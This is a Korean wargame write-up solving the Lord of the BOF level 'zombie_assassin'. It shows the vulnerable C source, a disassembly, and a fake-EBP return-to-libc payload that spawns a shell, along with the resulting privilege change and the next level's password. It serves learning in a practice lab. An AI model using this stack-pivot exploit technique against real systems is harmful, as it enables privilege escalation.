소스는 이렇다.
/*
The Lord of the BOF : The Fellowship of the BOF
- zombie_assassin
- FEBP
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
// strncpy instead of strcpy!
strncpy(buffer, argv[1], 48);
printf("%s\n", buffer);
}
일단 RET 부분에 라이브러리 주소 (\x40) 과 버퍼 주소(\xbf) 를 막아놨다.
그래서 RET 주소 부분을 옮길 필요가 있는데
ret를 어셈블리 부분으로 옮김으로써 RET를 버퍼로 옮길 수 있다.
어셈블리
Dump of assembler code for function main:
0x8048440 <main>: push %ebp
0x8048441 <main+1>: mov %esp,%ebp
0x8048443 <main+3>: sub $0x28,%esp
0x8048446 <main+6>: cmpl $0x1,0x8(%ebp)
0x804844a <main+10>: jg 0x8048463 <main+35>
0x804844c <main+12>: push $0x8048540
0x8048451 <main+17>: call 0x8048354 <printf>
0x8048456 <main+22>: add $0x4,%esp
0x8048459 <main+25>: push $0x0
0x804845b <main+27>: call 0x8048364 <exit>
0x8048460 <main+32>: add $0x4,%esp
0x8048463 <main+35>: mov 0xc(%ebp),%eax
0x8048466 <main+38>: add $0x4,%eax
0x8048469 <main+41>: mov (%eax),%edx
0x804846b <main+43>: add $0x2f,%edx
0x804846e <main+46>: cmpb $0xbf,(%edx)
0x8048471 <main+49>: jne 0x8048490 <main+80>
0x8048473 <main+51>: push $0x804854c
0x8048478 <main+56>: call 0x8048354 <printf>
0x804847d <main+61>: add $0x4,%esp
0x8048480 <main+64>: push $0x0
0x8048482 <main+66>: call 0x8048364 <exit>
0x8048487 <main+71>: add $0x4,%esp
0x804848a <main+74>: lea 0x0(%esi),%esi
0x8048490 <main+80>: mov 0xc(%ebp),%eax
0x8048493 <main+83>: add $0x4,%eax
0x8048496 <main+86>: mov (%eax),%edx
0x8048498 <main+88>: add $0x2f,%edx
0x804849b <main+91>: cmpb $0x40,(%edx)
0x804849e <main+94>: jne 0x80484b7 <main+119>
0x80484a0 <main+96>: push $0x8048561
0x80484a5 <main+101>: call 0x8048354 <printf>
0x80484aa <main+106>: add $0x4,%esp
0x80484ad <main+109>: push $0x0
0x80484af <main+111>: call 0x8048364 <exit>
0x80484b4 <main+116>: add $0x4,%esp
0x80484b7 <main+119>: push $0x30
---Type <return> to continue, or q <return> to quit---
0x80484b9 <main+121>: mov 0xc(%ebp),%eax
0x80484bc <main+124>: add $0x4,%eax
0x80484bf <main+127>: mov (%eax),%edx
0x80484c1 <main+129>: push %edx
0x80484c2 <main+130>: lea 0xffffffd8(%ebp),%eax
0x80484c5 <main+133>: push %eax
0x80484c6 <main+134>: call 0x8048374 <strncpy>
0x80484cb <main+139>: add $0xc,%esp
0x80484ce <main+142>: lea 0xffffffd8(%ebp),%eax
0x80484d1 <main+145>: push %eax
0x80484d2 <main+146>: push $0x804857e
0x80484d7 <main+151>: call 0x8048354 <printf>
0x80484dc <main+156>: add $0x8,%esp
0x80484df <main+159>: leave
0x80484e0 <main+160>: ret
여기서 leave 부분으로 RET를 돌려버리면
leave와 ret가 수행되면서 ret 시작주소를 buffer로 옮길 수 있게되고, buffer에 system주소를 넣게 되면 ret로 설정되어 system이 실행된다. 이 다음은 전 문제의 RTL 문제와 동일하다.
페이로드는
[AAAA] + [&SYSTEM] + [&EXIT] + [&/bin/sh] + [dummy] + [&BUFFER] + [&LEAVE]
./zombie_assassin "`python -c 'print "AAAA" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "A"*24 + "\xef\xfb\xff\xbf" + "\xdf\x84\x04\x08"'`"
[assassin@localhost tmp]$ ./zombie_assassin "`python -c 'print "AAA
A" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "A"*24 + "\xef\xfb\xff\xbf" + "\xdf\x84\x04\x08"'`"AAAAɀσ@AAAAAAAAAAAAAAAAAAAAAA༿¿߄
bash$ exit
exit
[assassin@localhost tmp]$ cd ..
[assassin@localhost assassin]$ ./zombie_assassin "`python -c 'print
"AAAA" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "A"*24 + "\xef\xfb\xff\xbf" + "\xdf\x84\x04\x08"'`"AAAAɀσ@AAAAAAAAAAAAAAAAAAAAAA༿¿߄
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=
516(zombie_assassin) groups=515(assassin)bash$ my-pass
euid = 516
no place to hide
'Wargame > LOB(끝)' 카테고리의 다른 글
| succubus->nightmare (0) | 2015.04.03 |
|---|---|
| zombie_assassin -> succubus (0) | 2015.04.02 |
| giant -> assassin (0) | 2015.03.22 |
| 파이썬 버그 0x0f -> 0x00 (0) | 2015.03.22 |
| bugbear -> giant (0) | 2015.03.22 |